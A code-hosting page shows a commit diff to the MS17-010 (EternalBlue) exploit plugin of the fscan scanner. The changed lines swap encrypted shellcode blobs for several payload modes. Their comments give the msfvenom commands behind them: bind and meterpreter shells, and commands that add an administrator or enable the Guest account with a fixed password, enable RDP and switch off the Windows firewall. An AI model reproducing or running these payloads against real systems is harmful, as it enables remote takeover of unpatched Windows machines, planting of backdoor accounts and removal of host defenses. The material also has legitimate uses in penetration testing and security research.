qwqdanchun
/
fscan
mirror of https://github.com/qwqdanchun/fscan.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update ms17010-exp.go

This commit is contained in:
影舞者 2022-11-21 10:35:00 +08:00 committed by GitHub
parent 769fc59fd1
commit 1166e24092
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 7 additions and 14 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

21
Plugins/ms17010-exp.go
View File

@ -13,32 +13,25 @@ import (
"time"
)
func MS17010EXP(info *common.HostInfo) {
address := info.Host + ":445"
var sc string
var sc_enc string
switch common.SC {
case "bind":
//msfvenom -p windows/x64/shell/bind_tcp LPORT=65432 -f hex
sc_enc = "aZ6HT8SGMKV04q20dOnyPK9qjjUZ4mq6l9SOxMKj0K7Uyq/ugxauU7KF3KrLhSUqfHkXdTU4C9iecU7qY5AjzF8Pe91258pbPpDJ/2FqrW4XD7RODvAKmJ175YEyRo+y0hV7aav0aa5wcpm6psV6Soq8vx8Q83fR2xSvTRtJMo96dZxCUWmuzZUF+91sYw4O3OeV/EzhZ40yJ2FGUovIJnDmsX8Vn/va3V5OONhmpXJYnrjj4QuFPkEpZi6nmhdr1gmzMq7YNP0aphUjlWuczX8v5ug6ZslVGuPjeYYonaAWKiNU2xPb8U2BuXPFEyG2PF5B8Q/XDhRKMX717QmAYX1kBeJClPPLiHV8uybI54m7t3S3JoFIO196MOFaWlFv+X+scB55bIKqtczndrWohujiJMKguyBfkdDmMvJ+NIoYmTJB+jf75S/HXQgHjCOZH9ARHyVkiYgT7WvFTxSP+qfNdbHIWK+uduT6nkCPHW7mxdlNR0fkncCpMPuR43kvtL4uUfCEmNufuZrLxr3kHeW8g1u9qLh2tq+w3qYBsIfJ7iYA3bDlpk751b8MJ+azvwK1/a/l0MXuSVMTbWMeKKefuwVmAUp5T7k8mWpA7+cu201DckYUQWaAW/p6YehYPMJ0b6kTV2LocHJinCQjAXCxa5YDCnqz6tVFtS7X0vreELXwXT6zqcs/W3xxfj3oVFgYsnwpTSa+d8A241ZJsz/0hhyIPE8LCi3+PeVvUwv7BJgIvJWdXd4CHx6y+QLiiNb8h2fyIt3e3v4pQFfvklhgXeCzCrA0dqiyMNR+W6NR3QAWQdhEKjkFPPzWYTB9q7mhToXAQSZgDw0eHEDpEudbYUalPlX3p83Wc2YS+lvr73uuhZ0VVTq/JWgmt/xZtfvKvZMYCG6UhayCyJyVperD2PP+dd99rUNa7dE6tKTflw0NMF0/zSFohby6fJoq1HxYLBScpi/d9qG/rKexovoUjsK7HtNQ/SI3cDQ6/qpOa54aBJHPf1+FrraaY/aKBOFBstNJkBTGGMEGW02kEmujZMJBhztUFwmvtXGoiOGK2jIGpamFg/dhAvnBDzkFzSMMKpxNo+1se2QzSNO59B66SGDd4bdUKEFzlvXGb/ZwtR1MVjINu0PpxKOmm72u/sfA2/cPe/bhdeP4+I3wSQjJavIHu8VBbneJrcj3BOFyMCI2ZL4FX9Qtefd8pnoBmli5bD9UqB4C9MYPj+gg3LBr5HX9Rr/qfDsjC/GyjOyJp3yLRK1WlLQqNuGmOHWggXbaWKrnO3swXHXkTlCfUWrCkdgdk9enytJZa6O5/6GzHi1/TDxRv/BZoUj+H4d6"
sc = AesDecrypt(sc_enc,key)
//msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=64531 -f hex
sc_enc := "gUYe7vm5/MQzTkSyKvpMFImS/YtwI+HxNUDd7MeUKDIxBZ8nsaUtdMEXIZmlZUfoQacylFEZpu7iWBRpQZw0KElIFkZR9rl4fpjyYNhEbf9JdquRrvw4hYMypBbfDQ6MN8csp1QF5rkMEs6HvtlKlGSaff34Msw6RlvEodROjGYA+mHUYvUTtfccymIqiU7hCFn+oaIk4ZtCS0Mzb1S5K5+U6vy3e5BEejJVA6u6I+EUb4AOSVVF8GpCNA91jWD1AuKcxg0qsMa+ohCWkWsOxh1zH0kwBPcWHAdHIs31g26NkF14Wl+DHStsW4DuNaxRbvP6awn+wD5aY/1QWlfwUeH/I+rkEPF18sTZa6Hr4mrDPT7eqh4UrcTicL/x4EgovNXA9X+mV6u1/4Zb5wy9rOVwJ+agXxfIqwL5r7R68BEPA/fLpx4LgvTwhvytO3w6I+7sZS7HekuKayBLNZ0T4XXeM8GpWA3h7zkHWjTm41/5JqWblQ45Msrg+XqD6WGvGDMnVZ7jE3xWIRBR7MrPAQ0Kl+Nd93/b+BEMwvuinXp1viSxEoZHIgJZDYR5DykQLpexasSpd8/WcuoQQtuTTYsJpHFfvqiwn0djgvQf3yk3Ro1EzjbR7a8UzwyaCqtKkCu9qGb+0m8JSpYS8DsjbkVST5Y7ZHtegXlX1d/FxgweavKGz3UiHjmbQ+FKkFF82Lkkg+9sO3LMxp2APvYz2rv8RM0ujcPmkN2wXE03sqcTfDdjCWjJ/evdrKBRzwPFhjOjUX1SBVsAcXzcvpJbAf3lcPPxOXM060OYdemu4Hou3oECjKP2h6W9GyPojMuykTkcoIqgN5Ldx6WpGhhE9wrfijOrrm7of9HmO568AsKRKBPfy/QpCfxTrY+rEwyzFmU1xZ2lkjt+FTnsMJY8YM7sIbWZauZ2S+Ux33RWDf7YUmSGlWC8djqDKammk3GgkSPHjf0Qgknukptxl977s2zw4jdh8bUuW5ap7T+Wd/S0ka90CVF4AyhonvAQoi0G1qj5gTih1FPTjBpf+FrmNJvNIAcx2oBoU4y48c8Sf4ABtpdyYewUh4NdxUoL7RSVouU1MZTnYS9BqOJWLMnvV7pwRmHgUz3fe7Kx5PGnP/0zQjW/P/vgmLMh/iBisJIGF3JDGoULsC3dabGE5L7sXuCNePiOEJmgwOHlFBlwqddNaE+ufor0q4AkQBI9XeqznUfdJg2M2LkUZOYrbCjQaE7Ytsr3WJSXkNbOORzqKo5wIf81z1TCow8QuwlfwIanWs+e8oTavmObV3gLPoaWqAIUzJqwD9O4P6x1176D0Xj83n6G4GrJgHpgMuB0qdlK"
sc = AesDecrypt(sc_enc, key)
case "cs":
//cs gen C shellcode -> fmt.Printf("%x", c) -> hex
sc = ""
case "add":
//msfvenom -p windows/x64/exec EXITFUNC=thread CMD='cmd.exe /c net user sysadmin "1qaz@WSX!@#4" /ADD && net localgroup Administrators sysadmin /ADD && REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f && netsh advfirewall set allprofiles state off' -f hex
sc_enc = "+w7eqC9F3rooElUlkRIf1tMg3KRpITKJdr1gjhO38bzwuDjLOdukKCR3Std9dzwcUZMUISTfilK/XkPhSjGFe63XGjDnZdr6b+IrB6CRbO/PYUJd7c7xKFKhr52DJFts/m4RHW6Ka0k/j8OqO9VmI75ze6A34QXtTLgV+zzPNImjzCeY5Cf4h0VZI32v280faebVOUFZ77v4OJMnDad4S1/fpbDLeHObigG5K9lzmZfvBGz+PySW2YONb3lBPlAtO1jD62ySX/Nj2Jec/QKmDxQuryEvlAgU0bZxV6Z1XCdJO+HLMLrxu1AhuGp/BsXzoixhUjWPBBJMeyPe+EiAtn27pwI2QCinBqMuK/mYW96Pf+qW4y4X001+dzp8snb76BRFqbsV+Wh0Ot5ctEqyCrI5gfP5rWCqjgqLHdTWNKWCeE9aZs6Lxl6J6f6XMoFKJ/b/Xc279ak+zJcdzi+BGHNCnlFGR+SZtVVm3ASYmw0OzRmbztyt4DRcxlRV+7EFdsGzerbdLz+hoURk6tUBluSfV2yo+qch/QJ7CXRgFR5STd+9Emj3zNAg8LLK7u/lv8tr0GCcAC0BMdozPnCzj/AkWidL7/1xojCdQ8s3stm0Dn8YTo6RX3GcPIduoIo2ge4KP6ADvAsQ8pekrUTkmC3pNGT3hDiT2Li84GQ0BhQqih7BItuE4hpHwGhnq+6ij9AGS3xdBS/NqODMU54WOeoqUrSp+nLN9n61qbXHr83q1PmNJFYJ5ptNobeicwWcHxZADHpT3O8KU5H9nsYNfnlABv1FGA2tgWaZjA4iqgzNGQF2dnFWAxUIxwaF3C+DLrvu8WONZaEYlnI7THq/xxGitHt8OnN5AY8FKU8zq6FQt4kRfOm5TO4pACbSKm/9n7EOXZ78GuMYeFaW56xqdJjFsbHvi8yJLIn9hOBjoSPL6Hg+cNijhayKMUc7rtLiqQd81kPaX7xDMusufsiekIySeWjWXZlQt+0tBveK56zzUGJIjAFaKK+VtPZcRyoFiU598OeS0ZPO3UP+nKi0uvhTEnT7KBjE4xAEHvX41P3u9lJIeaIewbqgsHgDSOrU1StCfqT+xO5Ltyy+1e2jDT2H2nquN9BGvdfxsNaGYnsodliKpmL77LsZAFdXyiiAu1Xb5DJhwJGO1Zi156HMC3tGWer5SF5M5H/ufENNxds632lqew2C7dkgLuEMDr+URldG2JMozhHc0u1VkqqlrbVEqnjNU+4D0Gne9pCVd06UhrrRDO6DdfFaYAfp+rz0EURo6CSoMsVIkJETPaVEhHD1qDi7S4p98Mu8aYnzBQpf9uUULrI3UQWHsGfG7iXVLCPwX6zUVE5LYb7JUsAFxvdoGbHjUMOJXGfM4HMQXB1PXXzQmyvLGDLNeLJ71EgE"
sc = AesDecrypt(sc_enc,key)
sc_enc := "Teobs46+kgUn45BOBbruUdpBFXs8uKXWtvYoNbWtKpNCtOasHB/5Er+C2ZlALluOBkUC6BQVZHO1rKzuygxJ3n2PkeutispxSzGcvFS3QJ1EU517e2qOL7W2sRDlNb6rm+ECA2vQZkTZBAboolhGfZYeM6v5fEB2L1Ej6pWF5CKSYxjztdPF8bNGAkZsQhUAVW7WVKysZ1vbghszGyeKFQBvO9Hiinq/XiUrLBqvwXLsJaybZA44wUFvXC0FA9CZDOSD3MCX2arK6Mhk0Q+6dAR+NWPCQ34cYVePT98GyXnYapTOKokV6+hsqHMjfetjkvjEFohNrD/5HY+E73ihs9TqS1ZfpBvZvnWSOjLUA+Z3ex0j0CIUONCjHWpoWiXAsQI/ryJh7Ho5MmmGIiRWyV3l8Q0+1vFt3q/zQGjSI7Z7YgDdIBG8qcmfATJz6dx7eBS4Ntl+4CCqN8Dh4pKM3rV+hFqQyKnBHI5uJCn6qYky7p305KK2Z9Ga5nAqNgaz0gr2GS7nA5D/Cd8pvUH6sd2UmN+n4HnK6/O5hzTmXG/Pcpq7MTEy9G8uXRfPUQdrbYFP7Ll1SWy35B4n/eCf8swaTwi1mJEAbPr0IeYgf8UiOBKS/bXkFsnUKrE7wwG8xXaI7bHFgpdTWfdFRWc8jaJTvwK2HUK5u+4rWWtf0onGxTUyTilxgRFvb4AjVYH0xkr8mIq8smpsBN3ff0TcWYfnI2L/X1wJoCH+oLi67xOs7UApLzuCcE52FhTIjY+ckzBVinUHHwwc4QyY6Xo/15ATcQoL7ZiQgii3xFhrJQGnHgQBsmqT/0A1YBa+rrvIIzblF3FDRlXwAvUVTKnCjDJV9NeiS78jgtx6TNlBDyKCy29E3WGbMKSMH2a+dmtjBhmJ94O8GnbrHyd5c8zxsNXRBaYBV/tVyB9TDtM9kZk5QTit+xN2wOUwFa9cNbpYak8VH552mu7KISA1dUPAMQm9kF5vDRTRxjVLqpqHOc+36lNi6AWrGQkXNKcZJclmO7RotKdtPtCayNGV7/pznvewyGgEYvRKprmzf6hl+9acZmnyQZvlueWeqf+I6axiCyHqfaI+ADmz4RyJOlOC5s1Ds6uyNs+zUXCz7ty4rU3hCD8N6v2UagBJaP66XCiLOL+wcx6NJfBy40dWTq9RM0a6b448q3/mXZvdwzj1Evlcu5tDJHMdl+R2Q0a/1nahzsZ6UMJb9GAvMSUfeL9Cba77Hb5ZU40tyTQPl28cRedhwiISDq5UQsTRw35Z7bDAxJvPHiaC4hvfW3gA0iqPpkqcRfPEV7d+ylSTV1Mm9+NCS1Pn5VDIIjlClhlRf5l+4rCmeIPxQvVD/CPBM0NJ6y1oTzAGFN43kYqMV8neRAazACczYqziQ6VgjATzp0k8"
sc = AesDecrypt(sc_enc, key)
case "guest":
//msfvenom -p windows/x64/exec EXITFUNC=thread CMD='cmd.exe /c net user Guest /active:yes && net user Guest "1qaz@WSX!@#4" && net localgroup Administrators Guest /ADD && REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f && netsh advfirewall set allprofiles state off' -f hex
sc_enc = "aZ6HT8SGMKV04q20dOnyPK9qjjUZ4mq6l9SOxMKj0K4lzrg1xPglYpF+v97tP3F9ViX/X44PY0NKKhJgtlWMAYV+lsvIrCyxdhxk+venYJW8R0Cw5vTbuaXlnWmba2ZbUrnZpoJVfJpJNjBnTNFkedK3LCFYLyPBJtwbaT5azGUmO0pkOtGthnPx4C5eUhplZihuJAD/pNtcJ71o/rLkw+JH0Mz+5DzN5T+dbAi8LuBtGMYBaVRtSVrZ+ZZtWEf8ZT1UIMD7druVl+elrJ5LBgcUU9hdH61cPUYgsPaytwxOG9BCJKasdW++NthXGlR6vO0JtJUHnYuFm1saHOkSYAn5U96LkAMYIZ78P7M2upUKnOah/ND5W06yW8oYdGVq7ACsyjrf8UNkVSpedg9EMRwKBJi2wEAzfUkl+USH7gOhbzm2D/ctz2CZEldptuu25jppiVqe2v7MKSRkp1WVipAywemUjZZ9OfDY+jOD6dB5w+vDy++7YJuwtK1ANdUVHhhgxHbfV/2/EtKrm76y/PJTGxTVObnJcajrP5mRy/7hDDo/i+sreXD92TQc1qbEvfi/7oJLy4OTvdTt1/tfSdr9pnQZPqD6gIgSHUvKb1McLL8JS3VgUMW5aSV+7CIAAIPrn+G4B6hH1+Bb0z0AIEnciCml2GUXj56fGwCT9rH7ONKpgwWYxmFi5qFF2Znts/UOsPGXWnOjW7fbX5YdkqfbsbNdfy69eRVi6xqRJ0gJU7GHoyl9mWqGz2VcRe1tU6BusAVe3vEToCtgUpCltPKk8Bci3P86mlzDRGpnFMXtvBf+4/BvAPRy3SgbddGcBq/TR+kol420b5Vk5qKs5dwtOrMp0V99VqfyxriqUSB42oA3gNlaSbwcttQzXX918DAgBlHIrVO+QaOQNBkTdvNLPWT1slW62jNjtmQz63TFrlz5qRmjE0tOPquZxB9z0NGqhLkG2vHfPmCMG2g9vHpXCDoKeVB0Hf2Air5MMPr8I426/DTHIQMMxMyC0IRz0MAcXh7W0Je5S42F2dfTc4VOnScCFUrlzLJw9QxyoDN6XJyr54Lu+GGhS+pDPwKLhhs+CK5Crl2CYLqMG1AoSrveY7+okMIYUhinXuC9V80SYDUXWg3E+PH34ULftgsemNhLmY2VxlO6vDZu28cRybrB6wvt0yeOECzYMIwrRCD73s+nIclbiiynBl7EfNo1ICwzpVMalHum11OObK7zBC7Wu/dAnoj0fs5phgoh9TNpmNDZRPWnT/SxoBOau6TZKAq/wiTyXbfRmL10jWmKnnVdr264863of/jiKm9X/RqMCrt9ECrX6XJckSAxFSry"
sc = AesDecrypt(sc_enc,key)
sc_enc := "Teobs46+kgUn45BOBbruUdpBFXs8uKXWtvYoNbWtKpNCtOasHB/5Er+C2ZlALluOBkUC6BQVZHO1rKzuygxJ3n2PkeutispxSzGcvFS3QJ1EU517e2qOL7W2sRDlNb6rm+ECA2vQZkTZBAboolhGfZYeM6v5fEB2L1Ej6pWF5CKSYxjztdPF8bNGAkZsQhUAVW7WVKysZ1vbghszGyeKFQBvO9Hiinq/XiUrLBqvwXLsJaybZA44wUFvXC0FA9CZDOSD3MCX2arK6Mhk0Q+6dAR+NWPCQ34cYVePT98GyXnYapTOKokV6+hsqHMjfetjkvjEFohNrD/5HY+E73ihs9TqS1ZfpBvZvnWSOjLUA+Z3ex0j0CIUONCjHWpoWiXAsQI/ryJh7Ho5MmmGIiRWyV3l8Q0+1vFt3q/zQGjSI7Z7YgDdIBG8qcmfATJz6dx7eBS4Ntl+4CCqN8Dh4pKM3rV+hFqQyKnBHI5uJCn6qYky7p305KK2Z9Ga5nAqNgaz0gr2GS7nA5D/Cd8pvUH6sd2UmN+n4HnK6/O5hzTmXG/Pcpq7MTEy9G8uXRfPUQdrbYFP7Ll1SWy35B4n/eCf8swaTwi1mJEAbPr0IeYgf8UiOBKS/bXkFsnUKrE7wwG8xXaI7bHFgpdTWfdFRWc8jaJTvwK2HUK5u+4rWWtf0onGxTUyTilxgRFvb4AjVYH0xkr8mIq8smpsBN3ff0TcWYfnI2L/X1wJoCH+oLi67xMN+yPDirT+LXfLOaGlyTqG6Yojge8Mti/BqIg5RpG4wIZPKxX9rPbMP+Tzw8rpi/9b33eq0YDevzqaj5Uo0HudOmaPwv5cd9/dqWgeC7FJwv73TckogZGbDOASSoLK26AgBat8vCrhrd7T0uBrEk+1x/NXvl5r2aEeWCWBsULKxFh2WDCqyQntSaAUkPe3JKJe0HU6inDeS4d52BagSqmd1meY0Rb/97fMCXaAMLekq+YrwcSrmPKBY9Yk0m1kAzY+oP4nvV/OhCHNXAsUQGH85G7k65I1QnzffroaKxloP26XJPW0JEq9vCSQFI/EX56qt323V/solearWdBVptG0+k55TBd0dxmBsqRMGO3Z23OcmQR4d8zycQUqqavMmo32fy4rjY6Ln5QUR0JrgJ67dqDhnJn5TcT4YFHgF4gY8oynT3sqv0a+hdVeF6XzsElUUsDGfxOLfkn3RW/2oNnqAHC2uXwX2ZZNrSbPymB2zxB/ET3SLlw3skBF1A82ZBYqkMIuzs6wr9S9ox9minLpGCBeTR9j6OYk6mmKZnThpvarRec8a7YBuT2miU7fO8iXjhS95A84Ub++uS4nC1Pv1v9nfj0/T8scD2BUYoVKCJX3KiVnxUYKVvDcbvv8UwrM6+W/hmNOePHJNx9nX1brHr90m9e40as1BZm2meUmCECxQd+Hdqs7HgPsPLcUB8AL8wCHQjziU6R4XKuX6ivx"
sc = AesDecrypt(sc_enc, key)
default:
if strings.Contains(common.SC, "file:") {
read, err := ioutil.ReadFile(common.SC[5:])